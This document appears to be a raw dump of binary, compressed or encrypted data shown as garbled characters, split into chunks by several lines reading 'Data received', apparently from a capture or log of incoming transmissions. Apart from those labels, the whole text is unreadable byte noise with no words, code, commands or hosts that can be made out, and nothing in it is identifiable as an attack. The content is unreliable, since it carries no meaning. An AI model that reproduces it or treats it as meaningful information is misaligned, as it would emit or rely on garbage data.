6ŠeCÔ¨E§|€ûÄ>▋ê^Ã+ǒÖ#ñ,í78›bë¿Éãóܹ•¦ƒÈ½Sxnùtìs¸‡æR¯§ž0Cé‡eÉ+7ä^ÊÏTüD8">Í þ¦%ÍùK!á$ïӛ³;”;¯IîX?Öm¬À?y ãœTë©q!,0!¶âžÿ4rûɖ Ðé?^h}¯fùùO­‘§ªUß?»Ã³Tì¨NBݾÖù’Èü1kÍõ«®81r[ùyOúX"ä>é1|]ºÉT!F]|tñKGx È¡B 6?–Oo|66–“;4„ÄŸÜÖë”ìåSÂËIñs#}5½£Q‰ J˜6ewNÖËÙ^ˆÞX-Ý ×$?q¢®Õ½ßÑ8H•Á^ç0ÉDž™ÿž½ýÙM|_W†µÃê˹²?P?ˆTï§*‹Ì¤w\Z¨m 0t6le{&ƒ }ÐzX˜2ßoE«6ØÞo&á.EL®ó2-´3¡~m-èìCÌÚÒX:ÑÌ/ä"šeØÉ"”& ÿÇ8‚Kžâu¸x ыÖ3ëKNNžG²’ƍ[UX ë~”y?XÇ Ö"|µ;LJ‚O@3Y‹¢Íû)¼öž°¸r¤'›ö¹EVþ×ÛȚ$V‰÷µ‚‰þ0b‘‚0N«iSgi“/Â9(ãÿo_?ÃÁÍ?ø:vßýAKL€ ]ø^4ôA«>íÕRþÊ&<WԤӉÅÚh»æ.â’it·Š9.˜F_…†–‚ k5Þ@7’‚"˜6ú3ô»ˆf[m î~Ý^ 2ûS|O×ð‰3;‘Ÿ-ø;O¸/ý÷(¨·„Ñʝ͓6ûF!èá5‹˜Pˆ>mlªr¨þ&Õ±žÛ=óföåhyxéåïZœÁç*ó)†]ÐÑQlêU͵ǹѰCQ•$pSµÜ¶q[YôË'±{L kÕÞAPžX%/ÌUgJ¢×hʟÑð]€òýàhk$Ž öT{ÉÅÐéßV,–ñ¢†b‡¹EýH‚¶= Ÿx¤]ŽòÐWaiò ‘Gèª{‘ñ¨êï^íú¡Þ’á.Dh" m¨Ë¨…²³MiŸÝ#訯â³ÑáCˆ4íþ¤tҁ9okn>¼À®J& 4Œ2ƒÏΛ€Zø?ûzùH¨Ø’¸è—GÞc‹ò=}$ò¿¼ø¤h9Ó)ôe"qîH¥Ýi¹ã ¢}ZfÍ·]Ğ#¿ÂÕBÂô\³Å-Žmó:/hoű_I-C>䨱·I1Ü<DбÓøftŠU*ûb˜m>{1Ôt¤ŠéÆ?„+oŽ¥,Š›e‹Pµ 5ãZ^ëÌ9œÉ¶J€ƒCr½f§ÊöḢ 釪0Ê®)FLŒÁœÐ„ZC@‡lb(?ɜâ•íÛyqÈ¡ãá]  êgs îp§Þ™È_XlÐóWbl×s„_9–ì†ÓØͶfR¥_ù@?Z§Lœ¹¢"Zt¦y½6}ð—ðÄuŸÇ˜ºÄ(JxÅ2§×äuQçúvìrßáF†Æ®^”.¡ð>±D,~P ÔU˜óÀ™Sêµlº¸^QXÆ{Ґ×¶öT¬^f¬©¨°\„~DõCM{4x³… BŠ$Gmêé]Þ4՞7§ṳ̈©Ä2A<.q›µ¿ /%ìŒ*g©¬ŽŒÈçZÃA‘’ˆ>o•{뢁xÍÜ7 Òým‚#ñ¶Ì½ðçóÎ]J3Ù;;O„걿Ž‘.ò\ãã¦`1~¸Ž“Tµ‚FÀpe“®„ûš ª\úö~!ͦZ¤ì:VÜ׆]ƒW0Ójä%Õù/
Data received Æڟém…Ó®´bSÕòñT@Ã6”âŠØ§Cc,Eûè'¿4uýË7›KFm…Sr)›Àæ …xdyk0B`7 „(,j.϶т«û@…µ&Zðeh_Jæh+>;k¦¸b©BøÈ W¤XDT¹áãWªB`“ýßÔmëӟnfêÎøí_¾ -”:s}E„ãK®q(ÃÙW‰“`Šd-%¢sNK‚Çjæ]¦5îÚÂt¾§®?‡]½°'z¦5&óÚê<½eNÂo‹ïÞ>¤u,´pûÖZŒP±Þ9uT)§Éàc½ìÔ]Ñ«ìXbU_{ŠàDå˜Å³IÙ!\è>àêÌÙ,X丄€üu”Z5aí)Ëä)YåaÄ£=:<—Ó õ¿:˜&þ™Ê`ŽóxÃÊ͙Йn!§¿Ã>ÁÍ Ì1(ŸªË€kL‡Êhþ ˜Nê@ÚŸ0ÏÖÅ×­féÞfù™16á }œ˜¨ ײ™’6֟÷ä^Ÿeâ.L|Q|χ úCófS„–X†7Ѐ á6¡ÞßÀ!ýƒÄ×?¨Uqû©¯K>nQe¼ñêØo†{‚Ð|¸Ç°Á¿£­ÉeH"5G8™Ã¾ÃÑ:ßäMÿ”¢ï lÖñðô‘ÆŒlQ¦ Þà@-¶}3¢Ï”<I5|Íï49L[9 ¡Ã—>RIB‰šäd@m§ÉÔºMÅóòU(0+VïDàØB«%–¼pÜǹ—÷¶í$à‚¨CcĜMѦà%͈ŅÙá—9êÄ€é†]Nªmì­Tø_{ ¯Ò[»°˜ ٖRx‚¿?¯ºjßÒóª"Ám#=ǂÔåxRÚö£DöòMR¸1°ÞiâßÆÃpËæ'STŽÕ„ð¯Pâh-GP—ÈŽ÷0º ¹øB±†Ò Äì*!¸Í´8MŽÃ¤]ŗñqå—íPõš5+ø$w/èçK¿†0ÆñTu¼drêŸW'3\~ªîô;ø¿ƒà|?#Þý¾¼ßE貉‹J¹ØšÀgAõÿ¯ly‹¬IóBáËU1/?x+y2ïSÏ°¢'­­¬I¿pñêò5ØWHS^¸¾Á2?¸7øë(ï/œ„žgۍ^;N¥µ Ôi'ÕXÐS’QçJnò H˹æKޟ¸—øÿÅx»a=>«À  Ÿ³ýôPd؏õ†NõöڰZ‰*ÕR|dž¢í¼ø¼8ü2ópV€W£A8éÂ÷}ßb•^îóA0“ ²`?”ÃÀ8Ê ¥z_z‘$H|„?9'½Ò3ã@âFá'? >л17Óé®e;Ÿ¦äPßiÊn7 [»Ø:™: ¼ÂS¡š@+Œ˜7û Y+ûVÑuªmÞ_¯­Ê+ñÓêž„­ Îw êæĤËTXþÛ$ÅUÌü1œÒ¯Î¨¨,Ñó(±ƒU[‘Ð ¡ÁeG²YH/-,€™M®–ý/Ë8«Q‡Y‹Y@á÷7t‡&|=¢÷Í"ål£¨ª’TÇ›H¸cËL•:é?õš¤´3„éµ*ï6So«Ò¨FÐ؎)ޙÎS Ð-.ÊBö¥š\þ{Ñ£\×¼}Û¢tÒåù*6­Eï,Ýõ`΋:)d„[ñgÜ1v™A—(dcÉ۔@ìêθ£2Mþ‚fiÂkó†vÿ4ˆ':Œ+!Ô«][(‚±lÖxc_µ3Àõf +¡š _cWÏ[áÜÄW²+ñÉláìg©õ]Äi’˜ƒ×#Ž«é¿Ò*什6.BòNŒiØúQêw€Pí6BA~qù© Ii©Âi—Å ÏçâØp;®[ŽI¦Æ(åê«Ûn‚£D…tÄàé¹ýP²&N)S£•ül'Õ{}½òâŠËh
Data received ʯ¦)æN–Dbž6Vú³ò0󟄁Œ:ù‘èâTîFcˆòß?‰Ž¦¿þÔ(¤‡0; k”@K"’ ³†±z®Ê ¤ÜÛ9ò c’Ä34°I ’è‰ÂJ][³þjgûr‡SmîÚB˜íË£Z¢yØ°…þ±æ¢9ßW2^‡Eƒ×Êq>üØa¿¨N¤ú¶R¨˜]ôË4=]“Õðµ5€¸q¼ï†Ç£îÜ¥…uƒÒ¥€JÜT$ÿ¶2ãýHâ9ÛÄCç}ô8¢ió˖äðD1a#•"w é™AˆW‚¥_!þ‚®âöÖ|cq+wW wEIF‹‹#&ÝæUÕrjàÆb­DÉüʦn²°°’A8jßú˜?˜+ÎlEFM~Ý= )f[°:cš"ô`±ôÆt…‡ƒš†ŠM:q­”àlLµE4=;CÔ `äßÎxF«"\ b®يF<ÊðÁ”slkؔ,DôdÒü)Jl;Òu/gÿÅï‰ãû–tÛôX8´ö\66ªÁ™V:F‰âXUþk?0î8µV<ƒgÛµË_»å ÚÔåä]ý $:ËÓ<MÎ>*Áö-™34¯¢ÑD‰siß âi ՀŒ ‚(¡ˆi§’6r ²¨7ÖÖÍäémLßÖùl<´vö$Å(òO£±Ûá±{;ýªþˆþÐÏ.A ð­ºÓ %çeÎLò±KcÇéÙúnaH4¬ ‡Ö}–øú¯S…þ²ó-Ýâ­zˆCq$Vzâ-ƒ<Š‡?؋î÷þ_€Ù¨9ûÎòN·Âï·Y ۀ5L<z¬ÖJUifl¼brnØÁ¨/ˆÇckÊ­fÌbÕðÅþ×1m*ÍåEfýuš³•Zúíªèf¾)DïÀñ\˜ý&¤Ä¨<·äó:@WMÕ%lT—~L„Jgıî/ôÃen ÜvIªDõx°#õUêÁK…<Ž ª^}7¿¾t­¨ó+Õ7hEâAÖÖê÷Ÿ¦ç³à"šg`QãɄ…PKð*ábú+×Á„?zf˜Ó¤-œ­¸:k¨vÕ;aó¯òoäÚškÜI<.¾qZfC¨ýÃ"ˆlw Mt%‘÷‰• ÔõNK«»[’_¥ ú}…‚¦Aoö¸„ž8¸S Ù*e2N—ug &E6dÏLqŸ):.R3E Ñéˆ$»Ø|¶ì¥¸úʁçO-³^´jXKy²õ”¼bÈ¿ âQ„ÂW”A‘•V¢`ùNic~Ù«6i¤Ütï~Ÿu>¹²a${C}c>‡|éš2F\q–ãP]™'F-†1Ðkþ"ÑïÀßւj’s+Qeixðt;vV‡ÁhÄ£<çrŗŠß¨œ‡£ èüžB+¤T'ôf°áÀBmö³‡£’àև~`M[›Šàe@"Õ⟛Y Ð(\O¬b†O䁘kYñºv†Œ¸wž\·×'zµ6KмaݎžºÓå:\ª²ÿv ù/:‚H"uùÚ_Oj&>ºäŒÏFe[ã§ÄWH°÷ð·‡D«<-¶ž±ï~û[™4ic’È@X`vlR¸0 ÷´ƒ<Mw S7€ÇôÐi+âöÐ~«–üj%n¸&SÕæ/µ¯$̶N5iz¯5´ý±íÅÅO³8°ŠZ ÿƽ˜‹NÃ9‡£—á9°,ÿM݋-ªö!@«½ ‰©x€±öüրÚq¤…zDÍ5—‹Ì}xù½ Ux÷þÖ!EN=\ؘ™î_){—ç–ÅBe#x¯/p  yÔM’c¤§ˆ” Žáq¥³Ü®ûǼMçÛX6’Sf-íVÖª]ICBû¼Y g–l¹ÆϗÙ‰'Ú™hɶ¹
Data received s˜ÌŒê/Etsvi1ÛX‰ÚšÇòÜ Dþz?Ĭ´‚¯'_¶é³ïÔÚQ؛¬¥ƒÝ#›áNœ¼ òÝ#âqbB]£¾ 74áJâM±±^!pášñÄi&ÃârÑ¢ª×hº¨¢°Nˆþž8 LKrÆ"oÚlWÇÜ —|U3>c\Ü%áÔ0|ŽA¾cM°ÜÑÔqÓÕrÖ ¯™ý×2¬F–Cf¸ê-qaÐõ5™ÃëÐNÕRƒHLn[z/1ÚÞҌYŒÉ‡^ÅæM ’µñ%ÝèÓ5=m6tãň õ˜‘q9ÆX–£›¿­ò¸¨÷!jì{]õUý™A\+J"Ä9åëX7ʗÂ]íbœ€àüSL«œÄ²çxµ”»$B~jâ( S£ì+ŠNƒ^ $£pÓ,óB•5jœÚ0ˆ¿«_¤"[ƒò„7"ÞÿíýEÉk:e¬³ì–48ǕT$DäS' c1Of.Xù8q¸ åi dqÅ"ü•/þ]'Y±DVû7þž,ºÁsZӜ©à‚ÁeGûêîÅ)ƒ¢å(ÅÕ倯K-BOʺwѧ ÷qûéàÌã®0ïõ`]ԉ hEêgóˆç¬®I–2+Ù~%úI‰ôÔ}Mӛã.y5K¾ÀQ‡6¶Ï½C¢®.ÕJVA†GÒE&͌XÈ°¶;Î÷]®­ëlbß„zp(æzÖ©5Epê ÙEŸ[Ÿ ò®lD\í@ö.+„büo©ò3mãô¦b(v*ø˜ û#“þÏ «¿±)ãFwËÕ2£üžéØÚ'Š®y€Ã‚þ‹2P‘î&ºêØ.~õ,…ЃVÏ< ‰áAèkËÙóMI+–=Ÿï„7òÇ·GX`óÔ!vo·2çPà á*…Ãð׋“V¢–ý%ÙâxÞͬa0 TiowYzRç®÷,{ýÖ¨¿9†ê+Š-2©ùÀßbÀ®ÃÃh"û]hÀ"ÉYêuðÓOÅü¸×d>'Y$¿C°µÿ^ t­ãb›ÊO¯Ï̍ÀEþüyÇä.uÐG“­Aú;Ö9›ƒýe¸â].Ù½Zᨪµ÷Ç6\CÆ4ÞȨvtbÚ·åÁž‘ð!¹67—çN°Ê ´žù¸§Ÿ™9‹ÖgÝrÔòPˆì±‡tGÊ3è´»—V<{ªd&¹‹<¬§»oN’w¹%§ÉG:œF:qýü&jƒ¶â“´ ­‹DúŒŽÑð¾dù41êÌÙ¿áx›æȧûÅÉ »#õ)¼é‰MS¦ Üãd±?€b¨Ã³*ҜEÔ †ãGG2 ±Ð£%äÝ:2VH%èÊÜ ½U¨3{MUµÇ^)ˆÀê`ÀÇ=µù^¶*8vûŽ8isÜtËåé~ ¥„ ÛÓÅÖÄdɹ˜NNÁ´˜ñy³ Ó9À»¶^’„`=n?Ã0-—ƒ™oGh.Ձ*(i¸µ³‹’ª–L‡ ûА„á‘bs|/½épF×ÿ¢yf-š¦#hT S^+öñn…X¶S¿› qá_;ó‰‘uN.á€"Jböf´Ì½T³m™ÇJô>ü‚ãÞ+«”G"õø§fiÙf<pEà„t—…Ììöçñhœrq½ eù#АnJTN¡6»Ô:Þk—cžimŸù*Šð¤X?Û1-C(#ª=¨ƒ{Éh{~äNÀ܎éÚ¢aŠ½S?¯t¦|<m|×P­l¾“IòåOoèäºPþp£E"½¨³ïæà‚dH2!œ`Ë@zZ%}_Õ(ñó¤XíœÜ Ä®‘ÍDÝTu½²«·· @×… ׆Ö=N¿PFMo6ÞÔ d4‰ŽËV7ºyW‡¸id‡ªÞݓBžy‘ª$?Ó*P^,O.ÖÌ¿ÂcþÉÊkáãӃ’PLjzŬ‚ü‘ÀÚîØ«¹¬™P?,Ö`“ª¿CW‰A©N¨ZÄzR‘Òy±½°7ꧣ ½ÃV+~þŽ”p «œŒ/'ÛॢÚ(ô¥;â(ñ~՘¾S°l-Ç!|ŸãmÓï»vÀÇ{g`½\#¬±-ì/Ýzmp©ÃRª§øÐ%’Š^mµÓýØPâtÉ¡àç7?H¤Ã³û|b¶&=;ÉâôÜ'T¨4_0¥¿¡?ÂqzÌG‚0õ ~Ù¤s;éÚP±M–·rcàçÖáŸe†2‚IÀBnßDËëÖ!¹ÏÃZŽ5Áe]Ê(Gw0v¯>l؍z«£Ú ß:xqçŠ-«g¹–Ìm ¶Á ¦“¾BÌÂMÚjâë!>w$…Vz*o“ò‘ÐÏ!Àù«çë¬bc\ —‡ezº‘³„zc`èâdBÙMB­D ¾uõ5Ü «Dl'ôa¡"?*A'²ÚŒ%è’| FnI{Óys-9±wšxÏ<÷¶ ²ì’4XúÏ!K­å}8þ]oÏéøMhé$‰e Õ=q¸YËz1ÖþÞñ‰aßIHΘw ¨´U¨Ô;Üpƒp­¢à­ÜÄkú:!°6g[6_¤M®swLÛ¥n\w&Ùc|Z”~ ¬|nã“W!f>ÎÖÿ»bQBï¯s>ÍdZÈåSjñ”¶ ϛ_,1õwòA×+TE# ¯‘“@’-$ƒ*A%-3Ò nWúÖ¦× 3ˆƘé*Hµ‹]—ë6k/×2Ç1®`RŽ5õÿˆ¬õ.‡6$eÁ¶žµîŸDB†™"kÁ”S±ˆœP– é1÷Ø£ÔøR¼*Š¢ƒ¢‡ÿžEN+]ÂþÕxݲÙsKf«,ñn«=Œ]ÔD++€¨Nñ2éü$Êô·¥e¡bJUúfª–æÏ^#7ìžÿ¬ŸTÕAŽ©+çÛ±D"Ç~?i«~ÁSõ%#âoö¨‡ G®cøûxÓAtÎ"žÅ4£Ý%_Pu<öÈfRŽ“š3íÚ÷ŸŽ5yÁYLA2·»‡ÛÞ@Ún‘Fec†Íª·Ô7A\Ù«U0¼ka”*¦Ó;Üã›e&½Ã1¤AÇ÷…Å(¯¯ˆÏ]7¡£µô ;W½´ænú&M—^υs8yó´õä1ñêGç)j6›Ž>hZP@0G¨±ë»÷ð€¸½/ÊC •s0\¶¡r „|šÐ÷r# Ïùö´‡¤eؚ×1’A»àñëP,€ñõ›å2\„ËÎñµ§%ó îŸIàðnúa0‘éªêU0†ÿð;8R®T‘R­:éÞáÝ  Ä6ùžqEÇÓXcé6EÕ+ìËB'°Øý„ =–ëeNaò–…—\-<[Nöµã·¬’…"Íé‘;ŧÎrV÷´i,q҄s“˜â»¨½•M…e·ˤߠ¶±ýLµVV-c¤qDNZōwæßÆ*[¡½ëa–ùL/„=ØþOÂ)/Î9¬—MÀBYö[œ”lÜ}£:û4Mq́#`;¸•ˆŒ¤(³‘Àäu±aPøyïÌÿc•ßXE©­½Óüò;ùI–‘½J¦„"êƵN—Oß©ðæs }kP.€6lâq1¾½@ÊþQÞ1òՃ@vG«§Õ!â€êN­ÁÓ¾Jë¦0d¸qݵ[!sI¹ÙŸ«…°Ô+¶¤–l6î÷Xßå©©Ë@¢ú\åàŸ?Ž›ƒ¯{Hà M‹Õ ]x9Šrò¹l۲ڃØøÿÂ*Nråø­æ1ÜŽ¿¤¥VÇ0«nLUÀ»¬kõx7 nqÞ®=ŒbÒÏxv:áZ0Àü1(-¡©5šHñcàôs³|lŠI'Ÿ})¸œ¨J½µÙ–GS<ù
Data received Ÿ j4•Å{ ¼ŽgöÚ6؈`ù÷Ùµ‘w¡‚Gû‰U˜h½}pæ¢,–ÈÇç×Àh¾³ÅŽPR†¨¦‰™S·¶žÕðõ  ŠLøþ‘oÒ#|ÇÍãuÞ¸$k?“Lÿg7¯ù~‡ +ÿÙÍ^ð×?·PŸìÿ97ÿ¤ƒœ‘s×e½êc²œ—J+SPrU§3%c ¯åÿ­{ÄÄÝUË/ý±< æÚ6“Ÿá‹,‹$‚¯éª2ÁÞmî>î@¥Y¬çšò»8*HK`¿uÏ!QÌÛç J*ãÇz­ÿ‡š¹ÄD|$Ž g+{í%”Ú(=$èÑRãænÝÄ Gn•îÇ_¥ØIR'¯Måe’–2|3 Ííp­)|ñ Më–ø!¥‹<Täö“½XªO õü‰É¬Ž¹˜”þ•@9”‘)/vêý–ȇ–âWš¯ñ×þ9žöˆä½¯>Sȁ$(Aõ3y¾îðoû.¢nJˆJG•Í¦ÀŠ,Õ7þ9ýM àŽ×£Ã®¾WÆø:êæTµn—³L°Õ#çëÄcÀ³)ŸÑ€eFˆ0Vü ä 3HQyÊõºY•؁‚vkùØ©tÀ!óŠ¡`ìáÓtsê¸ãº»T>Áö.lAÐ$úçS;¨Û!—cCB ÓIµh(]6;R Ž ù6‡ÂáàÞ¶›1™%T~Æã!âÉEÅ©-m¥¥î®qꬷÉZÅइç?ÅÁqò¯ëq) Z†]¦„RûûªG¯œ‘*sD­ mØâWXÈ«ïÛD/H8HùÇú©Ý˜¼o¶ÐÕnàá–ÇŽ<x)iíN㼑æJB­H5Ô¢‘”ùÒ,¨ÎXÐ#¤Í¨Xvr ô”Att:Nìˆ÷B)Mµ“Ó¶ÛÂc]âíCÅ '£W>W·KCž`¿Ê½9ž«À½XváG--QöäóM€.ÎÏ=Õ³õ¢³h'½š°&œ4Q ‚A?I¢|¶œxvqw6Š¸Øómó吽;„Vr“@LwŸŒq€³R{ ýMT2à6 P1œë‹0ð‡óq¾„£%jóu¦YµS«Ï€Þ$8Ž¹ìi¿_X î©\z÷àî .ÏXHQ='¾x{­°]E–š£dãÀ®Ý¤Bañ•"Uü­M¬¦«,âø᡺Ê`Zð ûOmS+N—Å`eº‰ºˆ…±–o¤¸&§W{©ÏˆU ò=¿âÆ֘ÖÀ§¹ tÛ ƒ9ɦÕ"§¦ÔÀœtÁ—æԊaG›“@˜(¼¨ª¬žX‡Û­ŠÒUK ?&GÍ–†6‚[!æä\vě²‘Ñq¨ù›U]Ä£X0=ŽG&È݁¥:½xŒ³}ƒÀ¯HwÛVƒNlPˆÆï1G!u½!RÁJY•ãYa¦{:ô?ÈOØ=Bæ| 8-þ¼ùXFw¬ƒ“W\ãåŽØ‰(Â(¿š&½_ JCjß3?ÞØ«= Y`º™É¢ÓÈ)ÐeH;Áõ!Ë&ù4‘ÜGÓ¡ðNð#5#¡ƒó¡JÇÉÍN½¡v#5ÇF¢Eߝ-æ†î EMĉ{§û@“Ús;ª3bõŒÿïÂaqÞ08Ù$]8rW-µ&á’þ÷€°•ÆÏãæÅ΂ة…·Í+:‡6I›y†üĖ„£ŒQ¡Ë`—$hÎ #0뷓ô24«°”ÂPRÇÎGü§N¹²b=ƒmqÄû¡+€Ñþgü âÜ­ß9¥ô¡ ºÝJñçËQ“ÈHÛàY Åù6 ¢Hg½«Àe=³¬¼û!6ě¦\\Š’Р0›ç 4¬¦ˆNÑ8¢µ†Oæ€3Œp=Ƅ8„µ]œK X Î ю;¿cOâ¬Î(L\d¤cU ÷&úr$ä·Çü5ÞR@ÒWPeÚô3D…P.¢Âû{£ÂÙ 0h÷<2Ï»ð@‡ËˆÈ… zƒHᒕ· ã]®ž½Tç³ 3¢zAžƒ úM&ќѠ qgSõúA}öÃËlbݳŽŒõW.1®=,´¶wÚ<£mwRìpjÑ*ú˜†6ÒñÓæßLú 2k±ŸâIq¹+EÇ0ü⻝ïîn´wBX®` ¤$YŸ4•FlªÕøïÚäݘ²’‡ÿ°uRÔÄ·R÷Ù?w6PTX0¬JJ¡† ó…-Ï:±Äô OԀÂìg6{ÕzrN¥û÷£2Ý$h!²¬@i}UŽŒ×w´± ]¹žÀd»»7eµGñÒa’W ±Wô^øK;ô,c뙑n`„‘j3ÛfؤŠD‰œ‹ÃQɇ% *ÈèigëžxRÆ}ޓNt#Ý>§ùRÂæ߈Hvœú°@7 ° ãM¥SVµ«mX™aÄgVÿ91ÓÁ—Üè}"ÆRªTFz.Ìً\zrâJ¡y»q„å¾AÉ> µa™>4Uæp“±1„0P×ÿN[VUð'+=> aÆܬª )¾rÇAõÉäÞ]Ý wŒƒü%²¯f?aíWù Ë* ööJˆ3…êñ&wDói„ZF]ÿ’î¡´#ÈnDª0_Kü›ç½]ë´Û[,$ÍHA*',ށÈW„Qf±Ñûý¥óKN:• yÑoŒ° °vùþà5Š* ª¥•pË(›ç‘†NoÀeI N6¯{»7•Ë,8š[–uŒžýÁ^Î럴‹´"ö¬ÑŸ•o’é"zú Ïoº¼M|É8 \Ð˞ËnâÏ.ýÑŖHýçn<ÇI—Ú˜è}Ý׫)¸±æIYkÀúI ©§=¯Žì“¾ÌÁTۍ-\éÎØ nYÚÃuìé«+Œi…ýMæ‡a¸r9ÛÈåBýø+÷·+µö †iÂU:‹u!õðP‰ÌŽ¥«ˆ0‘•¶¨=Oð££tL5únÍÝ€ªçDˆ9XŽ)MéÖ)k}«?I„^Ý ¹–šÀÆwi>9^.êj¥ÔúK­i¶ñ±9ëïbƬÁ &2º P8ä‡)<ùõ3 ¦]{¹ÀwY CÝdƒ¹¨?e}t¨^*o½Ü±òL0> šßr®Øо~tµ<‰ä(w%­&3É ˜º*áTª¡&]ò˜VȦ饡ucs5^9îþ'‹Œ£¹ïÊ¡˜W&Ê$“/#ôFE ªzy DǺ¡i¦Û‰€ÅfD©81pC%ïu’GÝsF퀖…ð¯õêÍ¿î®×¼[i"qm²oƒ&ð{ÏSøæPS_QE:Jý“*6–¾ÖØÚÇ!¶‹œWjÌJнVSՑOv€lD|N`¹»Hƒ {W^ç'Ã:i<gIz­ÝõÔñöãùS[ÝíüÅßèÿÙý÷MŽÊìƒ_÷bØÌE4;<åPVõÄ،«iè4Òï?z­¨xÚ\*ºÊ˝)ˆœ$,/´ÌBeñF0Fü Û‘dÇt¸·S³–d¡¥$˜®R—eø2‰S” >ô7 S‘5܁Ñ늷¿m@åÍk9R¡p8wŠÃTŸm‹rNfÄ¡ë̦»Ÿ°ÞÁ*UÉà¥4÷\ tñ„±]åŽyeՐbûÄ ÅJæîR9°½f±Tˆéa A*Äy Õ3E£H§©+Ӑà j¶˜%PS1J`HÄ  Mš¥+m‘99ŒaÝÿ»I½õAPUï3 ´Uæ¼ð°fbgV©*¾?W€,Ö­i«ô»ŸÜûÆBÞàUWUºü²A²™#CK_3ŽºU~=%% å^šÇð .c«‰”è¬Pe‘Áu¦m½
Data received >X=Wc$êêëiâªR®*ÉeÊ_u”š<ÜdLó4âôËI¦—dìcú¨›A«â7êÚiu!T¾iÚg ¾Fä[Æ[ÎÃÉA¾KÓ–cÌ2'èsPÈ Û/€_½ ‡TÑö&ÿ]ƒAf܊4ØdhðN×Ò ®’[3{ۉemM··gúpRȇ>ÿ²ÃiNŽ¾'Š—&‡×ëÿLWSãxÿʑ˞îZ¼á ؒüsn3÷^@WŠ>XÂU<á1SwäA"Žâ')É/A•³ŽU_H)$(¬uø+-%R(þÍÿm+º1¶p®óF<Ic,›CºéŠÒ«B¿A»@$$ôH3ä2‚æ©à|¦)»QÈ\[ WwŒø[à¶Ä»:{s¹P®˜óN ‚ˆÈ0$¬6çe=\)Qó‡ Φ¹Ö:Dó.^cHaÿ²ì>Ü³>¯ \ŽÈ1(?`ÏmLŸÞLÌÇød+ÕRK=¸.>P5ÿb.œà›ß„ؼG&¯‰fŽ½Ö¸à²Dà°ø1:ß×Kå;ŒåM²#ÂÍøt„7˜U‡ÚÛë ⪠5ç‘ šˆ=Ërmaª:X©ÏüLÙbº[’À1A¢ÈC-±'ð9Bà•: øE:¹‰1as¾Q&9´¢7Ôó?²÷%žØÁ#ÒF›˜9Î8¦ûx3}¯#<'#gŽ„/(=¦*Žûø&bøC„ÅuJ*’‘!+Œë Af}Òôš–}åùB÷ð·ûIï“ú³þòÔ¤á,Z^K<Â_Mcm¢‚fõJ¯ “c~h)AÛ›‡OÁ™®bu}ó# Pݪ½ÊG™rL‘ ßý&ìãÀ¿Ý†ÅÇpc…ZÖÂG؊9rS-Pë'Î.RxKPvî&Å®¿kä×F邖–µ/¼qãµ Éÿ°(…Ã2<wlÌøƒWδj$úÅI^d‚]ð•µüRõkqìòBüɬûw¢l-³€ìÒNe-AQ ç>›Mvʏnj,WvšA5T¶ìì):ĕɈPÓûE®nùˆ…%ŽOÓÀ»Çꬌ?i¥tØ"èFdD½CO_–ûÕóü®‹ŸMø‰!;Øšww€¡V`\¾KobnÚù+…ë@¦Ç,l¹™f=Jôô‚¾‘;¦´™Äç¥W¦ÅnÙËL\4ú¥Š» šª˜ù·(Ý>¬ør$?)zy@ø|¥ø¬\ú¼öűPº¦lkÅe-ä`ÚIjFšFwÿþg˜è[;çõÛö—]-&¢Nx_vm˜çèÐ}%`]×büÞõzq+/¦¿Á/x僥è}ôÉ'K¼ð»ý= ¯IAJJ<ð}t¯†d㻉 ò”‚d *|ï7Hàéaw<8 7U$¿šð/—•n*Þǎ÷ô붎àß8ˆˆm¹.æU_Ì'è19+×MÃm‹R΍?& {7‘¼†Ã7'KQf¼Â©c?E`Mý¬tIbzldŠq"6âOI³ÎŒù…±01ë@ybO®)x.[l‘¢Ö*·Ä“ŠõcÈ£²!2#|¸J5jÏx ‡uR™§¨Q„°#ò®ÚoÁ—˜†•Ä=-?Nк€ë=p´zBÍÒ¸Ç,Ô¸gùRK†/Û/Ϗ=¤ «JBŎÑGµîÞZNò»¸AÛìÊ]¹RöpúÒ AÁúñÙ#4_ ¥œ¯¬µ`ÆMlÚT÷T÷›8 ÷³µ)ñ×¢PZù}„9üe\9ö;Р¨»î,Í2|â̾ØÁ˜îƒl»8Åû @Ðt'¡™³ÿvKs»ï…+ë—À³Õäœð'¬hÙ1ÈE„‹B)½óK†‘ýÒCÎ$ý„)‰ë‡—ÂՑ"B~JÙQv‡ yW†ïI ’¨"²¶M—^è>œÞSCÏê‚!ÒéªÜÇxStځÀ3¹ÎM·Ú؟¨í6Á#{ŠÔg´.ç?îš/Pð·øû¡o»2”- ž’²Ãa½®Fúý/f'þ¨±øÓ2¸-ž¯ŸŸRû¢´Í¥óyëïàÚ¯+ø˨ŠY·¸¼¹‚VYµDŒª€ÌJJ¸Ù­¥}d»$*Æã<ˆ”82ÇDÐþ…£Âó˜)$œL`o¢N:ã÷¤*/LÈ}…©Ó°Õ¾¢ý¶É>àQÆ,‹&¾nn°$b7¿Óʑ³ZÀºœœ1Ì-…È:™Iínø%=‡7’Q§ÌaïŸ`è ¾Îl¥=1¢|­ÕEn¼¥éUßµš{dÃ7_h⣧ mJ)’^“I¨-­éÁÿ¿ØCO•—œgw€úÏ8¹ÍÿÍAò«SÑ6«~üâ$ó&öä0œÏD>Q ›yBš]“å.8ÃÈmÄ"1@Þôçs®Ç¤›öSZ琉ò@±w¯‘É«ÂÖæŽÙ·yRvÇ?èÚaä0¢gä͒ Š {šlªè '—bÒ®™«¥‰ñ†šçP±MŒr•Ô«Âç0wHsæ<"L?´ñMލ³0̉í5mÿEo=VŊaUîe0-«‡úÝ%}±e{ëð3¨ºdÓ£tŠ?â>ž½±e¦GŽ!çÑW¦)äÕÓð,7ü(n´°¡âîíºîÕÍíæQÿ_ê«ýLAv*~¹ŒÈ(È@§ë€!!r= £§\nÿÎí ½î{¯,Ç£ð|2dåÎil­‹AíÞ]n æ0v˜cSwêí¿îåäÔúÝögÙºoÔL„º×¦™+8ƒ¯¸Ü4Ä*Lö¨Ö«Ü„_hQ·“>Ûm%hÛ¨÷]7ÕÆq¼žôT¼Éˆdöä­r_\ÛìÉr=ã_h­j>3Áð–bç]ž\Ó:»œ£¬AĬZ üjúØT¦p|û»ÊRÞJÌrjk.)c]šСà_‡J<‘x± ã¬-8n¤"_±Èg("÷xöÿ¥ ¨Â¿v°³Wˆ¶ V u¢ßa¶,­’áez“ö|‰£?€ÜÊõSõãGÐY6_†`aßí(³}Ô´ù2 #tiÍUähвªÖ—„„Oô¥È*—³l70ç<Rº‚ês– §§óŒ]ª9 ·C¤¯»‚‚°Ñe­Å:jÜ<•hôà6–Ü\hÅ-‚¡…EËr(h ,@TMÍîp\¯©ŽÕòØa ?ŒEõ¯a°RC½Ð‡{ª:N¡ÂóóÖ Â*>… k3^ ™Å¹ãáÜ^­ 